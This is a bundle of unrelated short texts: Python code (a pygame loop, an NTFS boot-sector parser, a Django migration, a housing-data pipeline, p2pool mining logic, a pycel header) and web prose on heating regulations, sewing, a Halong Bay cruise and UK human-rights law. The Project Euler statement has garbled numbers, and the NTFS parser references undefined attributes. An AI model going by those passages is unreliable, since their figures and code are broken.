# Common to SDL and GL renderers:
self.planet.draw(self.screen, view)
for s in self.actors:
if s:
s.draw(self.screen, view)
# Draw lines between objects (DEBUG)
'''
a = transform.to_sdl(self.planet.body.position)
for ship in self.actors:
b = transform.to_sdl(ship.body.position)
pygame.draw.line(self.screen, (0,0,255), a, b)
'''
# Draw world bounding box
c = 90, 230, 230
ub = self.aabb.upper_bound
lb = self.aabb.lower_bound
x1,y1 = transform.to_sdl((lb.x, lb.y))
x2,y2 = transform.to_sdl((ub.x, ub.y))
pygame.draw.rect(self.screen, c, pygame.Rect(x1, y1, x2-x1, y2-y1), 2)
# End of frame
pygame.display.update()
self.clock.tick(self.frame_rate)
def mainloop(self):
while 1:
if kbd.process_events(self):
return
if self.net:
self.net.process_events(self)
self.update()
self.on_draw()
|
Additional standards for heating controls come into effect this year and installers need to be prepared for their introduction, says Colin Timmins.
The coming year should see some significant changes to the heating controls that are installed when replacing a boiler. While most installers recognise the benefits that controls will bring to their customers by ensuring the long term delivery of better comfort and low running costs, it is also realistic to recognise that many installations are carried out to cost pressure, which can often result in only the minimum standards being adopted.
It is therefore encouraging that the government has been reviewing the minimum standards that are currently in place under Part L of the Building Regulations and that moves are afoot to strengthen these requirements.
Following the publication of the Heat in Buildings consultation response last October, the UK government published amendments to the 2013 Domestic Building Services Compliance Guide that will come into force on the 6 April 2018.
One of the key changes is that the compliance guide now states that “when replacing a boiler, the boiler controls are considered to be a part of the boiler installation and should therefore meet the standards set out in the relevant sections of this document”.
This is a small but very significant change, as previously it stated that only the component being replaced (i.e. the new boiler) would have to comply with the guidance.
Installers will now have to ensure that the system meets minimum standards for boiler interlock, time and temperature control, as they would for a new system. This was generally accepted as a requirement by industry and building control in the current Building Regulations, but it is good that this is now more clearly stated.
Smart thermostat with automation and optimisation.
It is likely that the additional options above could lead to some head scratching, given that none of them are currently widely applied in UK homes.
Of course this is to be expected as government is trying to encourage new technologies, but BEAMA will be working to provide guidance to help installers select and install the right solutions and, importantly, to make sure that the use of these technologies leads to greater energy efficiency.
One piece of work currently underway is a cross-industry review of definitions to make sure there is sufficient clarity for specifiers, installers and market surveillance authorities, ready for when these requirements come into force.
BEAMA will of course be updating its practical guide for complying with these regulations by April.
One of the concerns that BEAMA had with the Heat in Buildings consultation response was that, while it highlighted the importance of thermostatic radiator valves (TRVs), it fell short of mandating these as a requirement (rather than just ‘good practice’ as currently) when boilers are replaced.
This could be about to change though, as just before Christmas there was agreement in Europe on the revision of the Energy Performance of Buildings Directive.
This agreement for the text included new requirements for individual room temperature controls, such as TRVs, to be installed in both new buildings and when boilers are replaced in existing properties. |
# -*- coding: utf-8 -*-
from rawdisk.util.rawstruct import RawStruct
from .headers import BIOS_PARAMETER_BLOCK, EXTENDED_BIOS_PARAMETER_BLOCK
class BootSector(RawStruct):
"""Represents NTFS Bootsector
Attributes:
oem_id (8 byte string): NTFS filesystem signature 'NTFS '
bpb (Bpb): Initialized :class:`~.bpb.Bpb` object.
mft_offset (int): Offset to MFT table from the start of \
NTFS volume in bytes
See More:
http://ntfs.com/ntfs-partition-boot-sector.htm
"""
def __init__(self, data=None, offset=None, length=None, filename=None):
RawStruct.__init__(
self,
data=data,
offset=offset,
length=length,
filename=filename
)
self.oem_id = self.get_string(3, 8)
self.bpb = BIOS_PARAMETER_BLOCK(
self.get_ushort_le(0x0B), # bytes_per_sector
self.get_ubyte(0x0D), # sectors_per_cluster
self.get_ushort_le(0x0E), # reserved_sectors
self.get_ubyte(0x15), # media_type
self.get_ushort_le(0x18), # sectors_per_track
self.get_ushort_le(0x1A), # heads
self.get_uint_le(0x1C), # hidden_sectors
self.get_ulonglong_le(0x28), # total sectors
)
self.extended_bpb = EXTENDED_BIOS_PARAMETER_BLOCK(
self.get_ulonglong_le(0x30), # mft_cluster
self.get_ulonglong_le(0x38), # mft_mirror_cluster
self.get_byte(0x40), # clusters_per_mft
self.get_ubyte(0x44), # clusters_per_index
self.get_ulonglong_le(0x48), # volume_serial
)
@property
def mft_record_size(self):
"""
Returns:
int: MFT record size in bytes
"""
if self.extended_bpb.clusters_per_mft < 0:
return 2 ** abs(self.extended_bpb.clusters_per_mft)
else:
return self.clusters_per_mft * self.sectors_per_cluster * \
self.bytes_per_sector
@property
def mft_offset(self):
"""
Returns:
int: MFT Table offset from the beginning of the partition in bytes
"""
return self.bpb.bytes_per_sector * \
self.bpb.sectors_per_cluster * self.extended_bpb.mft_cluster
@property
def mft_mirror_offset(self):
"""
Returns:
int: Mirror MFT Table offset from the beginning of the partition \
in bytes
"""
return self.bpb.bytes_per_sector * \
self.bpb.sectors_per_cluster * self.extended_bpb.mft_mirror_cluster
@property
def total_clusters(self):
return int(self.bpb.total_sectors / self.bpb.sectors_per_cluster)
@property
def bytes_per_cluster(self):
return self.bpb.sectors_per_cluster * self.bpb.bytes_per_sector
@property
def volume_size(self):
"""Returns volume size in bytes"""
return self.bpb.bytes_per_sector * self.bpb.total_sectors
|
Christmas sewing- lots of firsts!
Baby · Clothes · OMG!
Have you ever sewed something (or made something if you don’t sew) that had so many new parts to it that it was super intimidating? I totally just rewrote that sentence so I didn’t have to use the word “sewer”. I was listening to a podcast about sewing the other day and they were talking… Continue reading Christmas sewing- lots of firsts!
It’s no secret that I’m somewhat obsessed with Project Runway. Well, at least the three seasons that Netflix has deemed worthy of bestowing upon me. I may (or may not) check at the beginning of every month to see if the Netflix gods are smiling on me, giving me a new season to binge watch.… Continue reading Make it work!
I finally did a sew-a-long!
I had heard of people doing sew-a-longs before, but I had never done one. Well, okay, there was the summer sampler quilt thing I did last summer, but I was always a week or more behind, so I don’t know if that counts. Also, I never finished the quilt. So there’s that. This last week… Continue reading I finally did a sew-a-long! |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('imager_images', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='imageralbum',
name='published',
field=models.CharField(default=b'public', max_length=7, choices=[(b'public', b'Public'), (b'private', b'Private'), (b'shared', b'Shared')]),
preserve_default=True,
),
migrations.AlterField(
model_name='imageralbum',
name='title',
field=models.CharField(default=b'MyAlbum', max_length=63),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='description',
field=models.TextField(blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='published',
field=models.CharField(default=b'public', max_length=31, choices=[(b'public', b'Public'), (b'private', b'Private'), (b'shared', b'Shared')]),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='title',
field=models.CharField(default=b'MyPhoto', max_length=31),
preserve_default=True,
),
]
|
The Imperial Junk, traditional sailboat built of wood with modern facilities and first class service, is perfect for exploring Halong Bay on Imperial Cruise.
12:30 – On arrival at pier, you will board your Imperial Cruise and you are warmly welcomed by professional and friendly crew. Check into cabin.
13:00 – Enjoy specially prepared lunch while cruising through most beautiful parts of the magical Bay with thousands of amazing limestone islands emerging from emerald water. Sailing with Imperial Cruise in very tranquil route, exploring the exotic beauty of the legendary Bay, a feeling in paradise will come to you. Imperial Cruise brings our valued customers to the most tranquil parts of the Bay where you can’t find any boat there, cruising zigzag through hundreds of islands.
16:00 - Kayaking for an hour or more through slide rock cliffs.
17:00 - Swimming time, this is great chance to relax in water, jumping, diving, take a back flip, somersault.
20:30 -The moment you choose your own way to relax after dinner, watching movies, listening to Vietnamese traditional music. Besides, board games, squid fishing available for entertainment during the night time.
12:00 – Lunch in the restaurant at the bungalow – Catba Sandy Beach.
17:00 - Back to your Imperial Classic Cruise to refresh and relax, making friends with new group. |
'''
make_projects_table.py
----------------------
This file creates the projects table in the database, which is sent to
the front-end via /api/projects/. It depends on the following data sources:
- Projects.csv, From the Preservation Catalog Folder in the s3
- 'Affordable Housing Data': Updated regularly from open data DC
- Master Adress Repository
Projects that are not from the preservation catalog have an nlihc_id
beginning with "AH" for affordable housing.
'''
from . import utils
from . import wmata
import requests
import numpy as np
import pandas as pd
import geopandas as gp
preservation_catalog_columns = [
'nlihc_id',
'latitude',
'longitude',
'census_tract',
'neighborhood_cluster',
'ward',
'neighborhood_cluster_desc',
# Basic Project Information',
'proj_name',
'proj_addre',
'proj_units_tot',
'proj_address_id',
'proj_units_assist_max',
'proj_owner_type',
'most_recent_reac_score_num',
'most_recent_reac_score_date',
]
def load_preservation_catalog_projects():
'''
Loads the raw data from the preservation catalog.
It is located in 'preservation_catalog' on the S3.
'''
df = pd.read_csv(utils.S3+'preservation_catalog/Project.csv')
df.columns = df.columns.str.lower()
df = utils.get_census_tract_for_data(df, 'proj_lon', 'proj_lat')
df['neighborhood_cluster'] = utils.just_digits(df.cluster_tr2000)
df['ward'] = utils.just_digits(df.ward2012)
df = df.merge(load_reac_data(), how='left')
return df.rename(columns={'proj_lat': 'latitude',
'proj_lon': 'longitude',
'tract': 'census_tract',
'date': 'most_recent_reac_score_date',
'reac_score_num': 'most_recent_reac_score_num',
'cluster_tr2000_name': 'neighborhood_cluster_desc',
})[preservation_catalog_columns]
def load_affordable_housing_projects():
'''Loads and transforms the "Affordabe Housing" raw data from opendata.dc'''
columns = {
'ADDRESS_ID': 'proj_address_id',
'FULLADDRESS': 'proj_addre',
'MAR_WARD': 'ward',
'PROJECT_NAME': 'proj_name',
'TOTAL_AFFORDABLE_UNITS': 'proj_units_tot',
'LATITUDE': 'latitude',
'LONGITUDE': 'longitude',
'tract': 'census_tract',
}
url = utils.get_paths_for_data('affordable_housing', years=utils.get_years())[0]
df = pd.read_csv(url)
df['MAR_WARD'] = utils.just_digits(df['MAR_WARD'])
df = utils.get_census_tract_for_data(df, 'LONGITUDE','LATITUDE')
df = df.rename(columns=columns)[columns.values()]
df = utils.get_cluster_for_data(df, 'longitude', 'latitude')
df['nlihc_id'] = pd.Series(df.index).astype(str).apply(lambda s: 'AH' + s.zfill(6))
return df[['nlihc_id', 'neighborhood_cluster']+ list(columns.values())]
def load_mar_projects():
'''Loads and trasforms the "Address Points" raw data from opendata.dc'''
url = utils.get_paths_for_data('mar', years=utils.get_years())[0]
df = pd.read_csv(url)
df = df[['ADDRESS_ID', 'ACTIVE_RES_UNIT_COUNT', 'SSL', 'CLUSTER_']]
df.columns = ['proj_address_id', 'active_res_unit_count', 'ssl', 'neighborhood_cluster']
return df
def load_tax():
'''Adds the Project Taxable Value attribute to the data.'''
# Tax Data. Seems to update every year.
r = requests.get(
'https://maps2.dcgis.dc.gov/dcgis/rest/services/DCGIS_DATA/Property_and_Land_WebMercator/MapServer/53/query?where=1%3D1&outFields=SSL,ASSESSMENT&returnGeometry=false&outSR=4326&f=json'
)
data = r.json()['features']
return {r['attributes']['SSL']: r['attributes']['ASSESSMENT'] for r in data}
def load_topa():
'''
This function loads the raw TOPA data, grabs the most recent date for
each address id, and counts the number of TOPA notices for each address id.
It returns a dataframe where the obserations are an address id, the most
recent topa notice as a data, and the number of topa notices.
'''
df = pd.read_csv(utils.S3+'topa/Rcasd_current.csv')
df.columns = df.columns.str.lower()
df['most_recent_topa_date'] = pd.to_datetime(df['notice_date'])
return pd.concat([
# The most recent topa data.
(df.sort_values('most_recent_topa_date', ascending=False)
.groupby('address_id').first()['most_recent_topa_date']),
# Number of observations per address id.
df.address_id.value_counts()
], axis=1).reset_index().rename(columns={
# Fixing column names
'address_id': 'topa_count', 'index': 'proj_address_id'})
def load_reac_data():
'''Gets REAC information from the s3.'''
df = pd.read_csv(utils.S3+'preservation_catalog/Reac_score.csv')
df.columns = df.columns.str.lower()
df['date'] = pd.to_datetime(df['reac_date'])
df = df.sort_values('date', ascending=False).groupby('nlihc_id').first()
return df[['date', 'reac_score_num']].reset_index()
def load_project_data(engine):
'''With the addition of MAR - this takes a long time (a few minutes).'''
print("Starting load")
df = pd.concat([load_preservation_catalog_projects(),
load_affordable_housing_projects()], sort=True)
df = df.sort_values('nlihc_id').drop_duplicates('proj_address_id')
df = add_mar_and_tax(df)
df = add_neighborhoods(df)
df = df.merge(load_topa(), on='proj_address_id', how='left')
bus = wmata.add_bus_stops(df[['nlihc_id', 'longitude', 'latitude']],
'longitude', 'latitude')
df = df.merge(bus, how='left')
return utils.write_table(df, 'new_project', engine)
def add_mar_and_tax(df):
print("Adding mar and tax")
df = df.merge(load_mar_projects(), on='proj_address_id', how='left')
df['sum_appraised_value_current_total'] = df['ssl'].map(load_tax())
return df
def add_neighborhoods(df):
print("Adding neighborhoods")
# Fix neighborhood Cluster Info
df['neighborhood_cluster_x'] = utils.just_digits(df.neighborhood_cluster_x)
df['neighborhood_cluster_y'] = utils.just_digits(df.neighborhood_cluster_y)
df['neighborhood_cluster'] = df.apply(lambda row: max(
row.neighborhood_cluster_x, row.neighborhood_cluster_y), axis=1)
return df.drop(columns=['neighborhood_cluster_x', 'neighborhood_cluster_y'])
|
"I provide innovative strategies to help clients reach their intellectual property goals."
Wes works with clients to protect, enforce, and leverage their intellectual property rights. By utilizing prosecution and litigation experience in both patent and trademark, Wes provides clients with forward-looking, efficient IP strategies to help develop and protect their business.
Prior to joining Brinks, Wes clerked with Brannon Sowers & Cracraft in Indianapolis, IN. He worked on patents directed to various technologies; including pharmaceuticals, automotive, social networking, mobile application, medical devices, and mechanical devices. Wes also worked on patent and trademark litigation.
Before practicing law, Wes worked as a data analyst for Delphi Automotive, conducting research and development on automobile safety systems and lane and traffic-sign recognition technologies. |
from __future__ import division
import base64
import random
import sys
import time
from twisted.internet import defer
from twisted.python import log
import bitcoin.getwork as bitcoin_getwork, bitcoin.data as bitcoin_data
from bitcoin import helper, script, worker_interface
from util import forest, jsonrpc, variable, deferral, math, pack
import p2pool, p2pool.data as p2pool_data
class WorkerBridge(worker_interface.WorkerBridge):
def __init__(self, node, my_pubkey_hash, donation_percentage, merged_urls, worker_fee):
worker_interface.WorkerBridge.__init__(self)
self.recent_shares_ts_work = []
self.node = node
self.my_pubkey_hash = my_pubkey_hash
self.donation_percentage = donation_percentage
self.worker_fee = worker_fee
self.running = True
self.pseudoshare_received = variable.Event()
self.share_received = variable.Event()
self.local_rate_monitor = math.RateMonitor(10*60)
self.removed_unstales_var = variable.Variable((0, 0, 0))
self.removed_doa_unstales_var = variable.Variable(0)
self.my_share_hashes = set()
self.my_doa_share_hashes = set()
self.tracker_view = forest.TrackerView(self.node.tracker, forest.get_attributedelta_type(dict(forest.AttributeDelta.attrs,
my_count=lambda share: 1 if share.hash in self.my_share_hashes else 0,
my_doa_count=lambda share: 1 if share.hash in self.my_doa_share_hashes else 0,
my_orphan_announce_count=lambda share: 1 if share.hash in self.my_share_hashes and share.share_data['stale_info'] == 'orphan' else 0,
my_dead_announce_count=lambda share: 1 if share.hash in self.my_share_hashes and share.share_data['stale_info'] == 'doa' else 0,
)))
@self.node.tracker.verified.removed.watch
def _(share):
if share.hash in self.my_share_hashes and self.node.tracker.is_child_of(share.hash, self.node.best_share_var.value):
assert share.share_data['stale_info'] in [None, 'orphan', 'doa'] # we made these shares in this instance
self.removed_unstales_var.set((
self.removed_unstales_var.value[0] + 1,
self.removed_unstales_var.value[1] + (1 if share.share_data['stale_info'] == 'orphan' else 0),
self.removed_unstales_var.value[2] + (1 if share.share_data['stale_info'] == 'doa' else 0),
))
if share.hash in self.my_doa_share_hashes and self.node.tracker.is_child_of(share.hash, self.node.best_share_var.value):
self.removed_doa_unstales_var.set(self.removed_doa_unstales_var.value + 1)
# MERGED WORK
self.merged_work = variable.Variable({})
@defer.inlineCallbacks
def set_merged_work(merged_url, merged_userpass):
merged_proxy = jsonrpc.Proxy(merged_url, dict(Authorization='Basic ' + base64.b64encode(merged_userpass)))
while self.running:
auxblock = yield deferral.retry('Error while calling merged getauxblock:', 30)(merged_proxy.rpc_getauxblock)()
self.merged_work.set(dict(self.merged_work.value, **{auxblock['chainid']: dict(
hash=int(auxblock['hash'], 16),
target='p2pool' if auxblock['target'] == 'p2pool' else pack.IntType(256).unpack(auxblock['target'].decode('hex')),
merged_proxy=merged_proxy,
)}))
yield deferral.sleep(1)
for merged_url, merged_userpass in merged_urls:
set_merged_work(merged_url, merged_userpass)
@self.merged_work.changed.watch
def _(new_merged_work):
print 'Got new merged mining work!'
# COMBINE WORK
self.current_work = variable.Variable(None)
def compute_work():
t = self.node.bitcoind_work.value
bb = self.node.best_block_header.value
if bb is not None and bb['previous_block'] == t['previous_block'] and self.node.net.PARENT.POW_FUNC(bitcoin_data.block_header_type.pack(bb)) <= t['bits'].target:
print 'Skipping from block %x to block %x!' % (bb['previous_block'],
bitcoin_data.hash256(bitcoin_data.block_header_type.pack(bb)))
t = dict(
version=bb['version'],
previous_block=bitcoin_data.hash256(bitcoin_data.block_header_type.pack(bb)),
bits=bb['bits'], # not always true
coinbaseflags='',
height=t['height'] + 1,
time=bb['timestamp'] + 600, # better way?
transactions=[],
transaction_fees=[],
merkle_link=bitcoin_data.calculate_merkle_link([None], 0),
subsidy=self.node.net.PARENT.SUBSIDY_FUNC(self.node.bitcoind_work.value['height']),
last_update=self.node.bitcoind_work.value['last_update'],
)
self.current_work.set(t)
self.node.bitcoind_work.changed.watch(lambda _: compute_work())
self.node.best_block_header.changed.watch(lambda _: compute_work())
compute_work()
self.new_work_event = variable.Event()
@self.current_work.transitioned.watch
def _(before, after):
# trigger LP if version/previous_block/bits changed or transactions changed from nothing
if any(before[x] != after[x] for x in ['version', 'previous_block', 'bits']) or (not before['transactions'] and after['transactions']):
self.new_work_event.happened()
self.merged_work.changed.watch(lambda _: self.new_work_event.happened())
self.node.best_share_var.changed.watch(lambda _: self.new_work_event.happened())
def stop(self):
self.running = False
def get_stale_counts(self):
'''Returns (orphans, doas), total, (orphans_recorded_in_chain, doas_recorded_in_chain)'''
my_shares = len(self.my_share_hashes)
my_doa_shares = len(self.my_doa_share_hashes)
delta = self.tracker_view.get_delta_to_last(self.node.best_share_var.value)
my_shares_in_chain = delta.my_count + self.removed_unstales_var.value[0]
my_doa_shares_in_chain = delta.my_doa_count + self.removed_doa_unstales_var.value
orphans_recorded_in_chain = delta.my_orphan_announce_count + self.removed_unstales_var.value[1]
doas_recorded_in_chain = delta.my_dead_announce_count + self.removed_unstales_var.value[2]
my_shares_not_in_chain = my_shares - my_shares_in_chain
my_doa_shares_not_in_chain = my_doa_shares - my_doa_shares_in_chain
return (my_shares_not_in_chain - my_doa_shares_not_in_chain, my_doa_shares_not_in_chain), my_shares, (orphans_recorded_in_chain, doas_recorded_in_chain)
def get_user_details(self, request):
user = request.getUser() if request.getUser() is not None else ''
desired_pseudoshare_target = None
if '+' in user:
user, desired_pseudoshare_difficulty_str = user.rsplit('+', 1)
try:
desired_pseudoshare_target = bitcoin_data.difficulty_to_target(float(desired_pseudoshare_difficulty_str))
except:
pass
desired_share_target = 2**256 - 1
if '/' in user:
user, min_diff_str = user.rsplit('/', 1)
try:
desired_share_target = bitcoin_data.difficulty_to_target(float(min_diff_str))
except:
pass
if random.uniform(0, 100) < self.worker_fee:
pubkey_hash = self.my_pubkey_hash
else:
try:
pubkey_hash = bitcoin_data.address_to_pubkey_hash(user, self.node.net.PARENT)
except: # XXX blah
pubkey_hash = self.my_pubkey_hash
return user, pubkey_hash, desired_share_target, desired_pseudoshare_target
def preprocess_request(self, request):
user, pubkey_hash, desired_share_target, desired_pseudoshare_target = self.get_user_details(request)
return pubkey_hash, desired_share_target, desired_pseudoshare_target
def get_work(self, pubkey_hash, desired_share_target, desired_pseudoshare_target):
if (self.node.p2p_node is None or len(self.node.p2p_node.peers) == 0) and self.node.net.PERSIST:
raise jsonrpc.Error_for_code(-12345)(u'p2pool is not connected to any peers')
if self.node.best_share_var.value is None and self.node.net.PERSIST:
raise jsonrpc.Error_for_code(-12345)(u'p2pool is downloading shares')
if time.time() > self.current_work.value['last_update'] + 60:
raise jsonrpc.Error_for_code(-12345)(u'lost contact with bitcoind')
if self.merged_work.value:
tree, size = bitcoin_data.make_auxpow_tree(self.merged_work.value)
mm_hashes = [self.merged_work.value.get(tree.get(i), dict(hash=0))['hash'] for i in xrange(size)]
mm_data = '\xfa\xbemm' + bitcoin_data.aux_pow_coinbase_type.pack(dict(
merkle_root=bitcoin_data.merkle_hash(mm_hashes),
size=size,
nonce=0,
))
mm_later = [(aux_work, mm_hashes.index(aux_work['hash']), mm_hashes) for chain_id, aux_work in self.merged_work.value.iteritems()]
else:
mm_data = ''
mm_later = []
tx_hashes = [bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx)) for tx in self.current_work.value['transactions']]
tx_map = dict(zip(tx_hashes, self.current_work.value['transactions']))
if self.node.best_share_var.value is None:
share_type = p2pool_data.Share
else:
previous_share = self.node.tracker.items[self.node.best_share_var.value]
previous_share_type = type(previous_share)
if previous_share_type.SUCCESSOR is None or self.node.tracker.get_height(previous_share.hash) < self.node.net.CHAIN_LENGTH:
share_type = previous_share_type
else:
successor_type = previous_share_type.SUCCESSOR
counts = p2pool_data.get_desired_version_counts(self.node.tracker,
self.node.tracker.get_nth_parent_hash(previous_share.hash, self.node.net.CHAIN_LENGTH*9//10), self.node.net.CHAIN_LENGTH//10)
# Share -> NewShare only valid if 85% of hashes in [net.CHAIN_LENGTH*9//10, net.CHAIN_LENGTH] for new version
if counts.get(successor_type.VERSION, 0) > sum(counts.itervalues())*95//100:
share_type = successor_type
else:
share_type = previous_share_type
if True:
share_info, gentx, other_transaction_hashes, get_share = share_type.generate_transaction(
tracker=self.node.tracker,
share_data=dict(
previous_share_hash=self.node.best_share_var.value,
coinbase=(script.create_push_script([
self.current_work.value['height'],
] + ([mm_data] if mm_data else []) + [
]) + self.current_work.value['coinbaseflags'])[:100],
nonce=random.randrange(2**32),
pubkey_hash=pubkey_hash,
subsidy=self.current_work.value['subsidy'],
donation=math.perfect_round(65535*self.donation_percentage/100),
stale_info=(lambda (orphans, doas), total, (orphans_recorded_in_chain, doas_recorded_in_chain):
'orphan' if orphans > orphans_recorded_in_chain else
'doa' if doas > doas_recorded_in_chain else
None
)(*self.get_stale_counts()),
desired_version=share_type.SUCCESSOR.VERSION if share_type.SUCCESSOR is not None else share_type.VERSION,
),
block_target=self.current_work.value['bits'].target,
desired_timestamp=int(time.time() + 0.5),
desired_target=desired_share_target,
ref_merkle_link=dict(branch=[], index=0),
desired_other_transaction_hashes_and_fees=zip(tx_hashes, self.current_work.value['transaction_fees']),
net=self.node.net,
known_txs=tx_map,
base_subsidy=self.node.net.PARENT.SUBSIDY_FUNC(self.current_work.value['height']),
)
transactions = [gentx] + [tx_map[tx_hash] for tx_hash in other_transaction_hashes]
mm_later = [(dict(aux_work, target=aux_work['target'] if aux_work['target'] != 'p2pool' else share_info['bits'].target), index, hashes) for aux_work, index, hashes in mm_later]
if desired_pseudoshare_target is None:
target = 2**256-1
if len(self.recent_shares_ts_work) == 50:
hash_rate = sum(work for ts, work in self.recent_shares_ts_work[1:])//(self.recent_shares_ts_work[-1][0] - self.recent_shares_ts_work[0][0])
if hash_rate:
target = min(target, int(2**256/hash_rate))
else:
target = desired_pseudoshare_target
target = max(target, share_info['bits'].target)
for aux_work, index, hashes in mm_later:
target = max(target, aux_work['target'])
target = math.clip(target, self.node.net.PARENT.SANE_TARGET_RANGE)
getwork_time = time.time()
lp_count = self.new_work_event.times
merkle_link = bitcoin_data.calculate_merkle_link([bitcoin_data.hash256(bitcoin_data.tx_type.pack(tx)) for tx in transactions], 0)
print 'New work for worker! Difficulty: %.06f Share difficulty: %.06f Total block value: %.6f %s including %i transactions' % (
bitcoin_data.target_to_difficulty(target),
bitcoin_data.target_to_difficulty(share_info['bits'].target),
self.current_work.value['subsidy']*1e-8, self.node.net.PARENT.SYMBOL,
len(self.current_work.value['transactions']),
)
ba = bitcoin_getwork.BlockAttempt(
version=min(self.current_work.value['version'], 2),
previous_block=self.current_work.value['previous_block'],
merkle_root=bitcoin_data.check_merkle_link(bitcoin_data.hash256(bitcoin_data.tx_type.pack(transactions[0])), merkle_link),
timestamp=self.current_work.value['time'],
bits=self.current_work.value['bits'],
share_target=target,
)
received_header_hashes = set()
def got_response(header, request):
header_hash = bitcoin_data.hash256(bitcoin_data.block_header_type.pack(header))
pow_hash = self.node.net.PARENT.POW_FUNC(bitcoin_data.block_header_type.pack(header))
try:
if pow_hash <= header['bits'].target or p2pool.DEBUG:
helper.submit_block(dict(header=header, txs=transactions), False, self.node.factory, self.node.bitcoind, self.node.bitcoind_work, self.node.net)
if pow_hash <= header['bits'].target:
print
print 'GOT BLOCK FROM MINER! Passing to bitcoind! %s%064x' % (self.node.net.PARENT.BLOCK_EXPLORER_URL_PREFIX, header_hash)
print
except:
log.err(None, 'Error while processing potential block:')
user, _, _, _ = self.get_user_details(request)
assert header['previous_block'] == ba.previous_block
assert header['merkle_root'] == ba.merkle_root
assert header['bits'] == ba.bits
on_time = self.new_work_event.times == lp_count
for aux_work, index, hashes in mm_later:
try:
if pow_hash <= aux_work['target'] or p2pool.DEBUG:
df = deferral.retry('Error submitting merged block: (will retry)', 10, 10)(aux_work['merged_proxy'].rpc_getauxblock)(
pack.IntType(256, 'big').pack(aux_work['hash']).encode('hex'),
bitcoin_data.aux_pow_type.pack(dict(
merkle_tx=dict(
tx=transactions[0],
block_hash=header_hash,
merkle_link=merkle_link,
),
merkle_link=bitcoin_data.calculate_merkle_link(hashes, index),
parent_block_header=header,
)).encode('hex'),
)
@df.addCallback
def _(result, aux_work=aux_work):
if result != (pow_hash <= aux_work['target']):
print >>sys.stderr, 'Merged block submittal result: %s Expected: %s' % (result, pow_hash <= aux_work['target'])
else:
print 'Merged block submittal result: %s' % (result,)
@df.addErrback
def _(err):
log.err(err, 'Error submitting merged block:')
except:
log.err(None, 'Error while processing merged mining POW:')
if pow_hash <= share_info['bits'].target and header_hash not in received_header_hashes:
share = get_share(header, transactions)
print 'GOT SHARE! %s %s prev %s age %.2fs%s' % (
request.getUser(),
p2pool_data.format_hash(share.hash),
p2pool_data.format_hash(share.previous_hash),
time.time() - getwork_time,
' DEAD ON ARRIVAL' if not on_time else '',
)
self.my_share_hashes.add(share.hash)
if not on_time:
self.my_doa_share_hashes.add(share.hash)
self.node.tracker.add(share)
self.node.set_best_share()
try:
if (pow_hash <= header['bits'].target or p2pool.DEBUG) and self.node.p2p_node is not None:
self.node.p2p_node.broadcast_share(share.hash)
except:
log.err(None, 'Error forwarding block solution:')
self.share_received.happened(bitcoin_data.target_to_average_attempts(share.target), not on_time)
if pow_hash > target:
print 'Worker %s submitted share with hash > target:' % (request.getUser(),)
print ' Hash: %56x' % (pow_hash,)
print ' Target: %56x' % (target,)
elif header_hash in received_header_hashes:
print >>sys.stderr, 'Worker %s @ %s submitted share more than once!' % (request.getUser(), request.getClientIP())
else:
received_header_hashes.add(header_hash)
self.pseudoshare_received.happened(bitcoin_data.target_to_average_attempts(target), not on_time, user)
self.recent_shares_ts_work.append((time.time(), bitcoin_data.target_to_average_attempts(target)))
while len(self.recent_shares_ts_work) > 50:
self.recent_shares_ts_work.pop(0)
self.local_rate_monitor.add_datum(dict(work=bitcoin_data.target_to_average_attempts(target), dead=not on_time, user=user))
return on_time
return ba, got_response
|
Book hotels and make payment facilities.
Find a variety of options to book airline tickets across various flights, hotels, tour packages, car rentals, and more. You can choose your favorite destination and start planning your long-awaited vacation. You can also check availability of flights.
© Copyright UAE EXCHANGE. All Rights Reserved. |
__problem_title__ = "A frog's trip"
__problem_url___ = "https://projecteuler.net/problem=416"
__problem_description__ = "A row of squares contains a frog in the leftmost square. By " \
"successive jumps the frog goes to the rightmost square and then back " \
"to the leftmost square. On the outward trip he jumps one, two or " \
"three squares to the right, and on the homeward trip he jumps to the " \
"left in a similar manner. He cannot jump outside the squares. He " \
"repeats the round-trip travel times. Let F( , ) be the number of the " \
"ways the frog can travel so that at most one square remains " \
"unvisited. For example, F(1, 3) = 4, F(1, 4) = 15, F(1, 5) = 46, F(2, " \
"3) = 16 and F(2, 100) mod 10 = 429619151. Find the last 9 digits of " \
"F(10, 10 )."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
The UK government, like other governments, signed a human rights convention – in this case the European Convention of Human Rights – which meant that the people affected’s rights were protected under international law (which forms part of UK law). The convention was later incorporated directly into UK law in the form of a Parliamentary Act – the Human Rights Act.
Read more about the claimant’s human rights claims here.
Common law also forms part of UK law (alongside international law and parliamentary acts). Common law is formulated by Judges and cases. It often stems back many centuries and is not defined by statute (i.e. acts of parliament). These are principles that have been distilled by English courts through the ages into kind of “rights”. There are general principles that apply in common law (often replicated in Acts of Parliament now) such as fair trial, legality, property rights etc. They are a general set of legal principles applied by the courts.
Read more about the claimant’s common law claims here. |
# We will choose our wrapper with os compatibility
# ExcelComWrapper : Must be run on Windows as it requires a COM link to an Excel instance.
# ExcelOpxWrapper : Can be run anywhere but only with post 2010 Excel formats
try:
import win32com.client
import pythoncom
from pycel.excelwrapper import ExcelComWrapper as ExcelWrapperImpl
except:
print "Can\'t import win32com -> switch from Com to Openpyxl wrapping implementation"
from pycel.excelwrapper import ExcelOpxWrapper as ExcelWrapperImpl
import pycel.excellib
from pycel.excellib import *
from pycel.excelutil import *
from math import *
from networkx.classes.digraph import DiGraph
from networkx.drawing.nx_pydot import write_dot
from networkx.drawing.nx_pylab import draw, draw_circular
from networkx.readwrite.gexf import write_gexf
from pycel.tokenizer import ExcelParser, f_token, shunting_yard
import cPickle
import logging
import networkx as nx
__version__ = filter(str.isdigit, "$Revision: 2524 $")
__date__ = filter(str.isdigit, "$Date: 2011-09-06 17:05:00 +0100 (Tue, 06 Sep 2011) $")
__author__ = filter(str.isdigit, "$Author: dg2d09 $")
class Spreadsheet(object):
